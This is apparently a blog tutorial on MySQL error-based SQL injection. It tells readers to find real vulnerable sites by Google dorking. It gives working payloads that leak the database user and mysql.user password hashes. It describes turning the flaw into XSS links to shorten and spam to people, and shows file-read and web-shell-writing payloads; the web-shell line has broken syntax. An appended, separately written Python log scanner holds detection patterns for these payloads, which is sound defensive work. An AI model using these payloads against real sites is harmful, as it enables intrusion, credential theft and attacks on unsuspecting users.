
Source: http://blog.hacktalk.net/mysql-error-based-injection/


-----------------------------
MySQL Error Based Injection
-----------------------------
Author : Keith (k3170) Makan

Requirements:
>A brain
>A browser
>Basic SQL (poke around the internet for an SQL manual, it shouldn't take long to learn)

First off, let's make sure you guys know what Error Based SQL injection is and where you can find some good examples to train with.
We need to find web applications that:

*are backed by MySQL (the version doesn’t really matter right now)
*display full error dumps (detailing the syntax that causes the error)
*and obviously have an injection flaw (preferably on integer input data)

We can find these by Google Dorking for them (it's like fishing on the internet! lols). Whip out your Google search bar and enter:

`intext:"You have an error in your SQL" inurl:=1`
You can use any number you wish; I can guarantee good results for 1 though lols, it's the only number I've tested. The '=1' is obviously to make sure that we get a link to a script that accepts integer data!

This is the string that will be printed on a page that has encountered a MySQL error. The rest of the message is quite specific, so I suggest just searching for this; you should get just what we are looking for. As an example, you're looking for something like this:
[error_dump.pic]
If your page shows you something similar you're on the right track!
Side Note:
+----------------------------------------------------------------+
| !                                                              |
| You may need to bypass mysql_escape* functions and the like    |
| to get the database to listen to you; this is why I've opted   |
| for an injection on integer data, since largely people don't   |
| know how to escape them properly, and when they do it's still  |
| pretty easy to get around.                                     |
+----------------------------------------------------------------+
Now, what we have is a vulnerability; we need to turn it into an exploit. This is done by injecting a very specific query that allows us not only to generate an error, but to influence the contents of the error message (oh, that's why they call it that!!).

Without further ado, let's take a look at an injectable SQL query:

<?php
// the 'id' parameter is concatenated straight into the query string
mysql_query("select password from login where ID='$_GET[id]'");
?>
the URL may look like:
URL: www.[something].com/login.php?id=[SQL]

So clearly the injection flaw here is the 'id' parameter. You may be able to use a classic SQL injection by injecting a "union select" and filling in another query of your choosing, but this often doesn't work nowadays: web applications only display certain information from queries. To get around this we use error based SQL injection.

Should you not know how many columns the query is using, for instance if the query script looks like this:
<?php
mysql_query("select * from login where ID='$_GET[id]'");
?>
you may try enumerating the columns (which will just rack up a lot of noise in the access.log, and waste time) or you could inject this lil baby
(assuming we want to know the user() of the database):

URL: www.[something].com/login.php?id=-99 or row(1,1) > (select count(*),concat(user(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)

you should see something like this on the page:

ERROR 1062 (23000): Duplicate entry 'kmakan@localhost1' for key 'group_key'

You can see that the error message actually prints out the result of the 'user()' function call. This is because of the way the query was structured: when the results are grouped, MySQL has to choose between duplicates of the grouping key, and since nothing in particular separates these keys in the grouping, an error is generated because the grouping is illogical in this way. The floor(rand()*2) part is what makes the key collide: it is evaluated again when the row is inserted into the temporary grouping table, so a key that was not found on lookup can already be present on insert, and MySQL reports the duplicate entry, with our concat() result as the key.

What this means is that you can put any select statement you want in the concat() call of the query (so be creative!!). Should you want the same privileges and freedom as the web application itself on the web server, you may try leaking the password hashes like this:

URL: www.[something].com/login.php?id=-99 or row(1,1) > (select count(*),concat(injectString,0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)

where injectString = (select concat(User,0x2c,Password) from mysql.user limit 0,1)

You may ask why we need the "limit 0,1" in the injectString; well, this is because without it the select will generate a

ERROR 1242 (21000): Subquery returns more than 1 row

This is because we are generating a grouping key with the result of the select we injected, and grouping keys are one-dimensional pieces of data: if the result has more than one row it cannot be used as a grouping key.

Also, when you are constructing a query to inject in the place of injectString, make sure it only generates (or returns) one column. This is why I opted for

… select CONCAT(User,0x3c,Password) from …

and not

… select User,0x3a,Password from …

because you cannot use something with more than one column as a grouping key; should you try this, MySQL will generate a

ERROR 1241 (21000): Operand should contain 1 column(s)

And that's all folks!! Oh, I almost forgot: you would want to collect more than one piece of data from the server, so you need to know how to use the limit part of the inject. This is how you iterate through rows in a table using limit:

limit 0,1
limit 1,1
limit 2,1

limit n,1 (where n is the number of the row)

What else is this good for??
----------------------------

*XSS
An interesting note to add is that if Error Based SQL injection is possible, a quite effective XSS is possible too. To elaborate, here's an example:
www.example.com/script.php?id=-99 or row(1,1) > (select count(*),concat((select "[YOUR JAVASCRIPT]"),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)

You can then pass this URL through a shortener like t.co or whatever and serve it to people.
The effectiveness of this lies in the speed at which you can accomplish this and the fact that you can silently inject a small script into a trusted page!

For those of you who are skilled coders, you may even be able to write a lil script that dorks for Error Based vulnerabilities
and turns them into XSSs and then spams them.

*LFI<->RFI
Because MySQL supports the 'load_file' function and the 'into dumpfile' / 'into outfile' clauses, either a Local File Inclusion or a Remote File Inclusion style exploit can be performed, as an example:

An LFI:
www.example.com/script.php?id=-99 or row(1,1) > (select count(*),concat((select load_file('/var/log/apache2/access.log') into outfile '/tmp/logdump'),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)

An RFI:
www.example.com/script.php?id=-99 or row(1,1) > (select count(*),concat((select "<?php system[$_GET[cmd]]?>" into outfile /tmp/c0nfig.php),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)
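As a defender's counterpart to the payload shapes shown above, here is an added example (not part of the original article) that scans Apache access-log lines for the signature of this technique: the floor(rand()*2) key together with count(*) and GROUP BY, plus the load_file / INTO OUTFILE variants. The log lines, client addresses and rule names are constructed for the example; the payloads mirror the ones in the article.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log sample: line 2 carries the error-based payload
# from the article, line 3 the load_file/into outfile variant, lines 1 and 4
# are benign (line 4 deliberately contains the bare word "group").
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jan/2013:10:01:02 +0000] "GET /login.php?id=42 HTTP/1.1" 200 512
192.0.2.11 - - [19/Jan/2013:10:01:09 +0000] "GET /login.php?id=-99%20or%20row(1,1)%3E(select%20count(*),concat(user(),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%200,1) HTTP/1.1" 500 1024
192.0.2.12 - - [19/Jan/2013:10:02:33 +0000] "GET /script.php?id=-99%20or%20row(1,1)%3E(select%20count(*),concat((select%20load_file('/var/log/apache2/access.log')%20into%20outfile%20'/tmp/logdump'),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x) HTTP/1.1" 500 980
192.0.2.13 - - [19/Jan/2013:10:03:01 +0000] "GET /login.php?id=7&sort=group HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# A rule fires only when every pattern in it matches the decoded query string,
# so the grouping rule needs the rand()*2 key, an aggregate and a GROUP BY.
RULES = {
    "mysql_error_based_grouping": [
        re.compile(r"floor\s*\(\s*rand\s*\(\s*\)\s*\*\s*2\s*\)", re.I),
        re.compile(r"\bcount\s*\(\s*\*\s*\)", re.I),
        re.compile(r"\bgroup\s+by\b", re.I),
    ],
    "mysql_file_read_write": [
        re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I),
    ],
}

def normalize(url: str) -> str:
    # URL-decode twice (catches double encoding) and blank out /*...*/ comments
    decoded = unquote_plus(unquote_plus(url))
    return re.sub(r"/\*.*?\*/", " ", decoded)

def classify(line: str) -> list:
    """Return the names of the rules whose patterns all match the request's query string."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    path = normalize(m.group(1))
    query = path.partition("?")[2]
    return [name for name, pats in RULES.items() if all(p.search(query) for p in pats)]

def scan(log: str) -> list:
    """Return (client_ip, matched_rules) for every flagged line of an access log."""
    hits = []
    for line in log.splitlines():
        rules = classify(line)
        if rules:
            hits.append((line.split(" ", 1)[0], rules))
    return hits
```

scan(SAMPLE_LOG) flags 192.0.2.11 (grouping rule) and 192.0.2.12 (both rules) and leaves the two benign requests alone.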
